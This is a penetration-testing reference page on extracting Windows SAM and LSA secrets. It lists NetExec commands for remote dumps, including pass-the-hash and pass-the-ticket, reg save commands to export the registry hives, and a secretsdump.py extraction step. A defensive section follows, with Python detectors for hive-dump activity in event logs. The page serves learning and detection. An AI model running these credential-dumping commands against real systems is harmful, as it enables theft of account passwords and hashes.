# SAM & LSA secrets

## Overview

Windows passwords are hashed and stored in the SAM and SECURITY registry hives.

A breakdown of the important hives is shown below:

**SAM**

Stores the local account password hashes in LM or NT hash format.

**SECURITY**

Stores LSA secrets (which may be plaintext passwords, LM or NT hashes, or Kerberos keys (DES, AES)), domain cached credentials (DCC1 and DCC2), as well as security questions (L$SQSA).

**SYSTEM**

This hive holds the boot key needed to decrypt the SAM and LSA secrets, so it must be exported alongside them.

## Remotely Dumping

The SAM and LSA secrets can be dumped **remotely** by exporting the registry hives and then using a credential extraction tool. NetExec is a tool that will perform various remote network tasks, including dumping of the SAM and LSA secrets.

* <https://github.com/Pennyw0rth/NetExec>

NetExec may be used to connect to a remote Windows host using various types of credentials. It should be noted that you are required to have local administrator privileges to do this:

**Remote SAM/LSA secrets dump using domain user with local administrator privileges**

`netexec smb <Windows_IP> -d <domain> -u <user> -p <password> <--sam/--lsa>`

**Remote SAM/LSA secrets dump using local user with local administrator privileges**

`netexec smb <Windows_IP> --local-auth -u <user> -p <password> <--sam/--lsa>`

**Remote SAM/LSA secrets dump using pass-the-hash attack with local administrator user**

`netexec smb <Windows_IP> -d <domain> -u <user> -H <NT_hash> <--sam/--lsa>`

**Remote SAM/LSA secrets dump using pass-the-ticket attack with local administrator user**

`netexec smb <Windows_IP> --kerberos <--sam/--lsa>`

## Local Dumping

### The Dump

The SAM and LSA secrets can be dumped **locally** by exporting the registry hives locally and then using an offline credential extraction tool. The easiest way to export the registry hives is to use a local cmd prompt with the following commands:

`reg save HKLM\SAM "C:\Windows\Temp\sam"`

`reg save HKLM\SECURITY "C:\Windows\Temp\security"`

`reg save HKLM\SYSTEM "C:\Windows\Temp\system"`

These files can then be exfiltrated out of the Windows machine and onto your attack machine.

### Credential Extraction

secretsdump.py performs various techniques to dump password hashes and secrets.

* <https://github.com/fortra/impacket/blob/master/examples/secretsdump.py>

The command below should be used on your attack machine and be fed the registry files that you exported using the dump technique above:

`secretsdump.py -sam '<sam_hive>' -security '<security_hive>' -system '<system_hive>' LOCAL`
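From the defender's side, both dump paths above leave recognisable traces in host telemetry: the local path runs `reg save` against the SAM, SECURITY or SYSTEM hive (process-creation records), and the remote path starts the Remote Registry service and writes the saved hive as a temporary file through the ADMIN$ share. The Python below is an added example, not part of this page or of NetExec/impacket; the event records are constructed, normalised samples (field names and the temp-file location are assumptions, not real log formats).

```python
import re

# Matches "reg save HKLM\SAM", "reg.exe save HKLM\SECURITY", etc. (case-insensitive)
HIVE_SAVE_RE = re.compile(r"\breg(?:\.exe)?\s+save\s+\"?HKLM\\(SAM|SECURITY|SYSTEM)\b", re.I)

# Constructed sample events (NOT real logs): two local hive saves, one benign reg
# command, and a remote dump pattern on a second host.
SAMPLE_EVENTS = [
    {"host": "WS01", "event_id": 4688, "user": "CORP\\jdoe",
     "cmdline": 'reg save HKLM\\SAM "C:\\Windows\\Temp\\sam"'},
    {"host": "WS01", "event_id": 4688, "user": "CORP\\jdoe",
     "cmdline": "reg.exe save HKLM\\SECURITY C:\\Windows\\Temp\\security"},
    {"host": "WS01", "event_id": 4688, "user": "CORP\\jdoe",
     "cmdline": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion"},
    {"host": "SRV02", "event_id": 7036, "service": "Remote Registry", "state": "running"},
    {"host": "SRV02", "event_id": 5145, "user": "CORP\\svc_backup",
     "share": "\\\\*\\ADMIN$", "relative_target": "SYSTEM32\\aBcDeFgH.tmp"},
]


def detect_local_hive_saves(events):
    """Return (host, user, hive) for every process-creation record (4688) whose
    command line saves one of the three sensitive hives with reg.exe."""
    hits = []
    for ev in events:
        if ev.get("event_id") != 4688:
            continue
        m = HIVE_SAVE_RE.search(ev.get("cmdline", ""))
        if m:
            hits.append((ev["host"], ev["user"], m.group(1).upper()))
    return hits


def detect_remote_hive_dump(events):
    """Return (host, user, file) where the Remote Registry service entered the
    running state (7036) AND a .tmp file was accessed on ADMIN$ (5145) on that
    same host: the footprint a remote registry-hive export leaves behind."""
    remreg_hosts = {ev["host"] for ev in events
                    if ev.get("event_id") == 7036
                    and ev.get("service") == "Remote Registry"
                    and ev.get("state") == "running"}
    findings = []
    for ev in events:
        if (ev.get("event_id") == 5145
                and ev.get("share", "").upper().endswith("ADMIN$")
                and ev.get("relative_target", "").lower().endswith(".tmp")
                and ev["host"] in remreg_hosts):
            findings.append((ev["host"], ev["user"], ev["relative_target"]))
    return findings
```

Either detector on its own is noisy (backup software also saves hives and admins use Remote Registry), so treat a hit as a triage lead to be correlated with the logon source and account rather than a verdict.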
